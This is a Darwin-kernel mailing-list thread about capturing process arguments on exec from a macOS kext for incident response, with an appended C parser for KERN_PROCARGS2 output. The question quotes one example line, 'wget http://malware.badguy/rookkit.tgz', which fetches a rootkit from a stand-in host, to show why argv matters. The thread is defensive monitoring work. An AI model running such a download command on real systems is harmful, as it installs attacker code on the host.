Re: accessing argv on exec


  • Subject: Re: accessing argv on exec
  • From: Evan Lojewski <email@hidden>
  • Date: Tue, 11 Nov 2014 08:18:35 -0700

Hi Pete,

From my (limited) scan through kern_exec.c, it doesn't look like there is a good way to get access to the full command line. Someone at Apple will probably be able to suggest a good option.

*IF* this is a non-production kext, it is possible to update the execsw table to allow your kext to get access to this information, however it does require using private symbols. If you'd like an example on how to do that let me know and I'll send some code, but hopefully Apple has a better option that they can reply with first.

-- Evan Lojewski

On Mon, Nov 10, 2014 at 4:02 PM, Peter Moody <email@hidden> wrote:
Hey folks,

apologies for what will likely be a noobish question, I'm just getting
acquainted with xnu and kexts and all that.

I'm interested in monitoring process creation (and termination) on the
mac. It looks like I can use a kext that registers a listener for
kauth_fileop_exec to be notified of an exec, and the callback is:

 a) given a char* of the path to the binary.
 b) run in the context of the newly executing binary (so proc_self()
 and the like work for getting pid/ppid, etc).

but is there any way that I can actually access the argv that was passed
to the execve call?

I'm trying to do this to help our incident response capabilities, where
obviously just seeing that 'wget' was called is a lot less informative
than seeing 'wget http://malware.badguy/rookkit.tgz'

 Cheers,
 peter
 _______________________________________________
Do not post admin requests to the list. They will be ignored.
Darwin-kernel mailing list      (email@hidden)
Help/Unsubscribe/Update your Subscription:

This email sent to email@hidden

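Added example, not code from this thread or from Apple: the kauth listener Peter describes hands you the pid of the new image, and the usual user-space complement is to ask the kernel for that pid's argv with sysctl(KERN_PROCARGS2) and parse the buffer it returns. The buffer layout and the sample below are my own assumptions (the sample is constructed, not captured from a real host); the live sysctl lookup is only compiled on macOS, while the parser runs anywhere.

```c
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#ifdef __APPLE__
#include <sys/sysctl.h>   /* CTL_KERN, KERN_PROCARGS2 */
#endif

/* KERN_PROCARGS2 layout: int32 argc, executable path, NUL padding, argc
 * NUL-terminated argv strings, then the environment (ignored here). Returns
 * argc and fills argv_out (up to max_args), or -1 if the buffer is malformed
 * or truncated, e.g. because the process exited while it was being read. */
static int parse_procargs2(const char *buf, size_t len,
                           const char **argv_out, int max_args)
{
    int32_t argc;
    if (len < sizeof argc) return -1;
    memcpy(&argc, buf, sizeof argc);
    if (argc < 0) return -1;
    size_t p = sizeof argc;
    while (p < len && buf[p] != '\0') p++;   /* skip executable path */
    while (p < len && buf[p] == '\0') p++;   /* skip NUL padding */
    int n = 0;
    for (; n < argc && p < len; n++) {
        if (n < max_args) argv_out[n] = buf + p;
        while (p < len && buf[p] != '\0') p++;
        if (p++ >= len) return -1;           /* string not terminated */
    }
    return n == argc ? n : -1;
}
#ifdef __APPLE__
/* Live lookup for a pid (for instance one a KAUTH_FILEOP_EXEC listener has
 * reported to user space); returns a malloc'd buffer, or NULL on failure. */
static char *fetch_procargs2(int pid, size_t *out_len)
{
    int mib[3] = { CTL_KERN, KERN_PROCARGS2, pid };
    size_t len = 0;
    if (sysctl(mib, 3, NULL, &len, NULL, 0) != 0) return NULL;
    char *buf = malloc(len);
    if (!buf || sysctl(mib, 3, buf, &len, NULL, 0) != 0) { free(buf); return NULL; }
    *out_len = len;
    return buf;
}
#endif
/* Constructed sample in the kernel's layout (little-endian argc = 2), not
 * captured from a real system; after sample_argc() runs, argv[i] is sample_args[i]. */
static const char sample[] = "\x02\x00\x00\x00" "/usr/bin/curl\0\0\0"
    "curl\0" "http://example.invalid/file\0" "HOME=/Users/x\0";
static const char *sample_args[8];
static int sample_argc(void) { return parse_procargs2(sample, sizeof sample - 1, sample_args, 8); }
```

A short-lived process can exit before user space gets around to querying it, so the path and pid recorded in the callback remain the only guaranteed record; the parser reports a truncated buffer as an error rather than returning a partial argv.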
